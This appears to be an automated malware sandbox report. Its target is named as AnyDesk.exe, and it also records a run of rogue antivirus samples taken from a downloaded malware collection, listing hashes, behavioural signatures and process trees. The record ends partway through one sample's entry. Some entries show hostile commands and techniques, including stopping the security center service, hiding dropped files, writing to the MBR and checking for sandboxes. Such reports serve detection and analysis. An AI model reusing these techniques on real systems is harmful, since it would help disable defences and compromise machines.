Resubmissions

31-12-2023 09:11

231231-k5vvksadc3 6

29-12-2023 08:53

231229-ktts5sgbh8 10

Analysis

  • max time kernel
    1193s
  • max time network
    1195s
  • platform
    windows11-21h2_x64
  • resource
    win11-20231215-en
  • resource tags

    arch:x64arch:x86image:win11-20231215-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    29-12-2023 08:53

General

  • Target

    AnyDesk.exe

  • Size

    5.3MB

  • MD5

    75eecc3a8b215c465f541643e9c4f484

  • SHA1

    3ad1f800b63640128bfdcc8dbee909554465ee11

  • SHA256

    ec33d8ee9c3881b8fcea18f9f862d5926d994553aec1b65081d925afd3e8b028

  • SHA512

    b3a48230fc6f20038c938e5295b68a3f020b94e220ca2fab6a894d126dc41f6f1021c239613bf9d6de84370ad7df9d9a91baf716a87d43eb101ee3e48578e5ff

  • SSDEEP

    98304:j5ObAu2pmits24nYhQCWQdaQQo/mJPv4KYZPKBhYI5RuN4OL2wIjcsJWNg3:IAnRu24nR5QcTvYdmPuWOL2TcQWe3

Malware Config

Signatures

  • Windows security bypass 2 TTPs 3 IoCs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Enumerates VirtualBox registry keys 2 TTPs 1 IoCs
  • Blocks application from running via registry modification 18 IoCs

    Adds application to list of disallowed applications.

  • Disables RegEdit via registry modification 1 IoCs
  • Drops file in Drivers directory 4 IoCs
  • Modifies Installed Components in the registry 2 TTPs 1 IoCs
  • Identifies Wine through registry keys 2 TTPs 1 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Unexpected DNS network traffic destination 36 IoCs

    Network traffic to other servers than the configured DNS servers was detected on the DNS port.

  • Windows security modification 2 TTPs 3 IoCs
  • Adds Run key to start application 2 TTPs 7 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Sets file execution options in registry 2 TTPs 64 IoCs
  • Writes to the Master Boot Record (MBR) 1 TTPs 3 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Drops file in System32 directory 29 IoCs
  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops file in Program Files directory 20 IoCs
  • Drops file in Windows directory 26 IoCs
  • Executes dropped EXE 26 IoCs
  • Loads dropped DLL 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 63 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 12 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 10 IoCs
  • Modifies Internet Explorer settings 1 TTPs 16 IoCs
  • Modifies Internet Explorer start page 1 TTPs 2 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Runs net.exe
  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: AddClipboardFormatListener 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 17 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 39 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 4 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe
    "C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe"
    1⤵
    • Checks processor information in registry
    • Suspicious use of WriteProcessMemory
    PID:1500
    • C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe
      "C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe" --local-control
      2⤵
      • Suspicious behavior: AddClipboardFormatListener
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      PID:3808
    • C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe
      "C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe" --local-service
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1376
      • C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe
        "C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe" --backend
        3⤵
        • Drops file in System32 directory
        • Suspicious use of SetWindowsHookEx
        PID:1380
      • C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe
        "C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe" --backend
        3⤵
        • Drops file in System32 directory
        • Suspicious use of SetWindowsHookEx
        PID:5020
      • C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe
        "C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe" --backend
        3⤵
        • Drops file in System32 directory
        • Suspicious use of SetWindowsHookEx
        PID:3648
  • C:\Windows\system32\AUDIODG.EXE
    C:\Windows\system32\AUDIODG.EXE 0x00000000000004CC 0x00000000000004EC
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:1696
  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
    1⤵
    • Enumerates system info in registry
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2252
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fff1ab23cb8,0x7fff1ab23cc8,0x7fff1ab23cd8
      2⤵
        PID:1968
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1880,18104125406994074979,3714981607261342939,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1912 /prefetch:2
        2⤵
          PID:4744
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1880,18104125406994074979,3714981607261342939,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2308 /prefetch:3
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:3212
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1880,18104125406994074979,3714981607261342939,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2532 /prefetch:8
          2⤵
            PID:2248
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1880,18104125406994074979,3714981607261342939,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3248 /prefetch:1
            2⤵
              PID:4756
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1880,18104125406994074979,3714981607261342939,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3236 /prefetch:1
              2⤵
                PID:1972
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1880,18104125406994074979,3714981607261342939,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3652 /prefetch:1
                2⤵
                  PID:3768
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1880,18104125406994074979,3714981607261342939,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3912 /prefetch:1
                  2⤵
                    PID:236
                  • C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1880,18104125406994074979,3714981607261342939,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3444 /prefetch:8
                    2⤵
                    • Suspicious behavior: EnumeratesProcesses
                    PID:1176
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1880,18104125406994074979,3714981607261342939,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5180 /prefetch:8
                    2⤵
                    • Suspicious behavior: EnumeratesProcesses
                    PID:5108
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1880,18104125406994074979,3714981607261342939,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5264 /prefetch:1
                    2⤵
                      PID:800
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1880,18104125406994074979,3714981607261342939,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5428 /prefetch:1
                      2⤵
                        PID:3156
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1880,18104125406994074979,3714981607261342939,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5356 /prefetch:8
                        2⤵
                        • Suspicious behavior: EnumeratesProcesses
                        PID:456
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1880,18104125406994074979,3714981607261342939,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5272 /prefetch:8
                        2⤵
                          PID:1804
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1880,18104125406994074979,3714981607261342939,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5628 /prefetch:1
                          2⤵
                            PID:3836
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1880,18104125406994074979,3714981607261342939,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5604 /prefetch:1
                            2⤵
                              PID:3048
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1880,18104125406994074979,3714981607261342939,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:1
                              2⤵
                                PID:4156
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1880,18104125406994074979,3714981607261342939,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4620 /prefetch:1
                                2⤵
                                  PID:428
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1880,18104125406994074979,3714981607261342939,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5204 /prefetch:1
                                  2⤵
                                    PID:4160
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1880,18104125406994074979,3714981607261342939,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2500 /prefetch:1
                                    2⤵
                                      PID:4764
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1880,18104125406994074979,3714981607261342939,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2892 /prefetch:1
                                      2⤵
                                        PID:3928
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1880,18104125406994074979,3714981607261342939,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5328 /prefetch:1
                                        2⤵
                                          PID:484
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1880,18104125406994074979,3714981607261342939,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6496 /prefetch:1
                                          2⤵
                                            PID:3904
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1880,18104125406994074979,3714981607261342939,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6492 /prefetch:8
                                            2⤵
                                              PID:4148
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1880,18104125406994074979,3714981607261342939,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6732 /prefetch:1
                                              2⤵
                                                PID:3112
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1880,18104125406994074979,3714981607261342939,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3012 /prefetch:1
                                                2⤵
                                                  PID:3156
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1880,18104125406994074979,3714981607261342939,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1640 /prefetch:2
                                                  2⤵
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:3456
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1880,18104125406994074979,3714981607261342939,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5676 /prefetch:8
                                                  2⤵
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:4360
                                              • C:\Windows\System32\CompPkgSrv.exe
                                                C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                1⤵
                                                  PID:4308
                                                • C:\Windows\System32\CompPkgSrv.exe
                                                  C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                  1⤵
                                                    PID:3048
                                                  • C:\Windows\System32\CompPkgSrv.exe
                                                    C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                    1⤵
                                                      PID:4316
                                                    • C:\Windows\System32\rundll32.exe
                                                      C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                      1⤵
                                                        PID:1264
                                                      • C:\Program Files\7-Zip\7zG.exe
                                                        "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\MalwareDatabase-master\" -spe -an -ai#7zMap10067:106:7zEvent12014
                                                        1⤵
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:1184
                                                      • C:\Program Files\7-Zip\7zG.exe
                                                        "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\MalwareDatabase-master\trojans\*\" -spe -an -ai#7zMap4424:1392:7zEvent26269
                                                        1⤵
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:1832
                                                      • C:\Program Files\7-Zip\7zG.exe
                                                        "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\MalwareDatabase-master\rogues\*\" -spe -an -ai#7zMap31253:3994:7zEvent2670
                                                        1⤵
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:2752
                                                      • C:\Program Files\7-Zip\7zG.exe
                                                        "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\MalwareDatabase-master\ransomwares\*\" -spe -an -ai#7zMap10873:2380:7zEvent28753
                                                        1⤵
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:3804
                                                      • C:\Users\Admin\Downloads\MalwareDatabase-master\rogues\Antivirus\[email protected]
                                                        "C:\Users\Admin\Downloads\MalwareDatabase-master\rogues\Antivirus\[email protected]"
                                                        1⤵
                                                        • Adds Run key to start application
                                                        • Drops file in Program Files directory
                                                        • Executes dropped EXE
                                                        • Modifies Internet Explorer settings
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of SendNotifyMessage
                                                        • Suspicious use of SetWindowsHookEx
                                                        PID:2892
                                                        • C:\Windows\SysWOW64\net.exe
                                                          net stop wscsvc
                                                          2⤵
                                                            PID:3452
                                                            • C:\Windows\SysWOW64\net1.exe
                                                              C:\Windows\system32\net1 stop wscsvc
                                                              3⤵
                                                                PID:2216
                                                            • C:\Windows\SysWOW64\net.exe
                                                              net stop winmgmt /y
                                                              2⤵
                                                                PID:2868
                                                                • C:\Windows\SysWOW64\net1.exe
                                                                  C:\Windows\system32\net1 stop winmgmt /y
                                                                  3⤵
                                                                    PID:2920
                                                                • C:\Windows\SysWOW64\Wbem\mofcomp.exe
                                                                  mofcomp C:\Users\Admin\AppData\Local\Temp\4otjesjty.mof
                                                                  2⤵
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:1312
                                                                • C:\Windows\SysWOW64\net.exe
                                                                  net start wscsvc
                                                                  2⤵
                                                                    PID:4120
                                                                    • C:\Windows\SysWOW64\net1.exe
                                                                      C:\Windows\system32\net1 start wscsvc
                                                                      3⤵
                                                                        PID:4692
                                                                    • C:\Windows\SysWOW64\net.exe
                                                                      net start winmgmt
                                                                      2⤵
                                                                        PID:3052
                                                                        • C:\Windows\SysWOW64\net1.exe
                                                                          C:\Windows\system32\net1 start winmgmt
                                                                          3⤵
                                                                            PID:4644
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                        1⤵
                                                                        • Drops file in System32 directory
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:4732
                                                                      • C:\Users\Admin\Downloads\MalwareDatabase-master\rogues\Antivirus 2010\[email protected]
                                                                        "C:\Users\Admin\Downloads\MalwareDatabase-master\rogues\Antivirus 2010\[email protected]"
                                                                        1⤵
                                                                        • Suspicious use of SetThreadContext
                                                                        • Executes dropped EXE
                                                                        PID:4176
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          "C:\Windows\system32\cmd.exe"
                                                                          2⤵
                                                                            PID:2584
                                                                          • \??\globalroot\systemroot\system32\usеrinit.exe
                                                                            /install
                                                                            2⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                            PID:2564
                                                                        • C:\Users\Admin\Downloads\MalwareDatabase-master\rogues\Antivirus Platinum\[email protected]
                                                                          "C:\Users\Admin\Downloads\MalwareDatabase-master\rogues\Antivirus Platinum\[email protected]"
                                                                          1⤵
                                                                          • Drops file in Windows directory
                                                                          • Executes dropped EXE
                                                                          PID:1636
                                                                          • C:\WINDOWS\302746537.exe
                                                                            "C:\WINDOWS\302746537.exe"
                                                                            2⤵
                                                                            • Executes dropped EXE
                                                                            PID:4148
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\D1B9.tmp\302746537.bat" "
                                                                              3⤵
                                                                                PID:3464
                                                                                • C:\Windows\SysWOW64\regsvr32.exe
                                                                                  regsvr32 /s c:\windows\comctl32.ocx
                                                                                  4⤵
                                                                                  • Loads dropped DLL
                                                                                  • Modifies registry class
                                                                                  PID:1588
                                                                                • C:\Windows\SysWOW64\regsvr32.exe
                                                                                  regsvr32 /s c:\windows\mscomctl.ocx
                                                                                  4⤵
                                                                                  • Loads dropped DLL
                                                                                  • Modifies registry class
                                                                                  PID:4140
                                                                                • \??\c:\windows\antivirus-platinum.exe
                                                                                  c:\windows\antivirus-platinum.exe
                                                                                  4⤵
                                                                                  • Windows security bypass
                                                                                  • Disables RegEdit via registry modification
                                                                                  • Windows security modification
                                                                                  • Executes dropped EXE
                                                                                  • Loads dropped DLL
                                                                                  • Modifies Internet Explorer settings
                                                                                  • Modifies Internet Explorer start page
                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                  • System policy modification
                                                                                  PID:1800
                                                                                • C:\Windows\SysWOW64\attrib.exe
                                                                                  attrib +h c:\windows\antivirus-platinum.exe
                                                                                  4⤵
                                                                                  • Drops file in Windows directory
                                                                                  • Views/modifies file attributes
                                                                                  PID:2800
                                                                          • C:\Users\Admin\Downloads\MalwareDatabase-master\rogues\Antivirus Pro 2017\[email protected]
                                                                            "C:\Users\Admin\Downloads\MalwareDatabase-master\rogues\Antivirus Pro 2017\[email protected]"
                                                                            1⤵
                                                                            • Adds Run key to start application
                                                                            • Enumerates connected drives
                                                                            • Writes to the Master Boot Record (MBR)
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of SendNotifyMessage
                                                                            • Suspicious use of SetWindowsHookEx
                                                                            PID:588
                                                                          • C:\Users\Admin\Downloads\MalwareDatabase-master\rogues\Antivirus Pro 2017\[email protected]
                                                                            "C:\Users\Admin\Downloads\MalwareDatabase-master\rogues\Antivirus Pro 2017\[email protected]"
                                                                            1⤵
                                                                            • Writes to the Master Boot Record (MBR)
                                                                            • Executes dropped EXE
                                                                            PID:3428
                                                                          • C:\Users\Admin\Downloads\MalwareDatabase-master\rogues\AnViPC2009\[email protected]
                                                                            "C:\Users\Admin\Downloads\MalwareDatabase-master\rogues\AnViPC2009\[email protected]"
                                                                            1⤵
                                                                            • Drops file in Program Files directory
                                                                            • Executes dropped EXE
                                                                            PID:652
                                                                            • C:\Program Files (x86)\antiviruspc2009\avpc2009.exe
                                                                              "C:\Program Files (x86)\antiviruspc2009\avpc2009.exe"
                                                                              2⤵
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              • Suspicious use of SendNotifyMessage
                                                                              • Suspicious use of SetWindowsHookEx
                                                                              PID:2216
                                                                          • C:\Users\Admin\Downloads\MalwareDatabase-master\rogues\FakeAdwCleaner\[email protected]
                                                                            "C:\Users\Admin\Downloads\MalwareDatabase-master\rogues\FakeAdwCleaner\[email protected]"
                                                                            1⤵
                                                                            • Executes dropped EXE
                                                                            PID:384
                                                                            • C:\Users\Admin\AppData\Local\6AdwCleaner.exe
                                                                              "C:\Users\Admin\AppData\Local\6AdwCleaner.exe"
                                                                              2⤵
                                                                              • Adds Run key to start application
                                                                              • Executes dropped EXE
                                                                              • Suspicious use of SetWindowsHookEx
                                                                              PID:3236
                                                                          • C:\Users\Admin\Downloads\MalwareDatabase-master\rogues\Happy Antivirus\[email protected]
                                                                            "C:\Users\Admin\Downloads\MalwareDatabase-master\rogues\Happy Antivirus\[email protected]"
                                                                            1⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of SendNotifyMessage
                                                                            PID:2516
                                                                          • C:\Users\Admin\Downloads\MalwareDatabase-master\rogues\InternetSecurityGuard\[email protected]
                                                                            "C:\Users\Admin\Downloads\MalwareDatabase-master\rogues\InternetSecurityGuard\[email protected]"
                                                                            1⤵
                                                                            • Enumerates VirtualBox registry keys
                                                                            • Blocks application from running via registry modification
                                                                            • Drops file in Drivers directory
                                                                            • Adds Run key to start application
                                                                            • Checks for any installed AV software in registry
                                                                            • Enumerates connected drives
                                                                            • Sets file execution options in registry
                                                                            • Writes to the Master Boot Record (MBR)
                                                                            • Executes dropped EXE
                                                                            • Modifies Internet Explorer settings
                                                                            • Modifies data under HKEY_USERS
